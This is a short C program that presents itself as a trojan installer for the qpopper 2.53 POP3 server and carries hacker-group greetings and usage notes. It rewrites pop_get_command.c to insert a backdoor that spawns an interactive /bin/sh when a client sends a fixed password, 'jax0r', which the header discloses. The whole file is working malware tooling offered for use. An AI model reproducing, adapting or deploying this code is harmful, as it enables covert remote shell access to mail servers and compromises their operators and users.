/**** Qpop v2.53 Trojan Installer v1.1 c0de by gov-boi of (hhp) gov-boi@hack.co.za Idea thought of by: nikel-com <nikel@legion2000.cc> usage: tar -zxf qpopper2.53.tar.Z .. copy src-qpopd.c into the "qpopper2.53" root directory .. compile .. run .. and have phun kiddies ;) backd00r password is "jax0r" ----------. Greets: mobsters.. b4b0.. darkcyde.. and hhp.. w00p special shout to Pavlov ****/ #include <stdio.h> #include <stdlib.h> #include <unistd.h> void display_usage(void); int main(int argc, char *argv[]) { char *scanstring = "The client command was not located in the command/state table"; char *w00p="pop_get_command.c"; char buffer[1002]; char buffer2[1002]; FILE *fp, *wo0p; if((fp = fopen(w00p, "r")) == NULL) { fprintf(stderr, "Error opening file: pop_get_command.c\n"); fprintf(stderr, "missi0n unsuccessfull.. lam3r!\n"); exit(1); } wo0p = fopen("zzzzzz","w"); while(fgets(buffer, 1000, fp) != NULL) { strcpy(buffer2, buffer); if(strstr(buffer, scanstring) != 0) { fprintf(wo0p," /* The client command was not located in the command/state table */\n"); fprintf(wo0p," if (p->pop_command = \"jax0r\")\n"); fprintf(wo0p," { execl(\"/bin/sh\",\"/bin/sh -i\", NULL);return(0);}\n"); } if(strstr(buffer, scanstring) == 0) { fprintf(wo0p,"%s", buffer2); } } fclose(fp); fclose(wo0p); system("mv zzzzzz pop_get_command.c"); fprintf(stderr, "missi0n successfull.. i phear j00!@#\n"); return 0; }